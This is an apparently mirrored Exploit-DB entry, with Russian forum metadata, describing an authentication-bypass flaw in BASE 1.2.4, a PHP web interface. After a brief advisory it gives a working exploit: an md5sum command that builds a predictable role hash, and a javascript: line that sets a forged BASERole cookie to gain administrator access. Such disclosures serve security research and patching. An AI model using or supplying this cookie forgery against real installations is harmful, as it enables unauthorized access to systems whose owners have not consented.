- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 33052
- Проверка EDB
-
- Пройдено
- Автор
- TIM MEDIN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-05-23
Код:
source: https://www.securityfocus.com/bid/35470/info
Basic Analysis And Security Engine (BASE) is prone to an authentication-bypass vulnerability.
An attacker can exploit this issue to gain unauthorized access to the affected application. Successfully exploiting this issue will lead to other attacks.
BASE 1.2.4 is vulnerable; prior versions are also affected.
The following examples are available:
echo -n 10000nidemBASEUserRole | md5sum
javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e; path=/"- Источник
- www.exploit-db.com
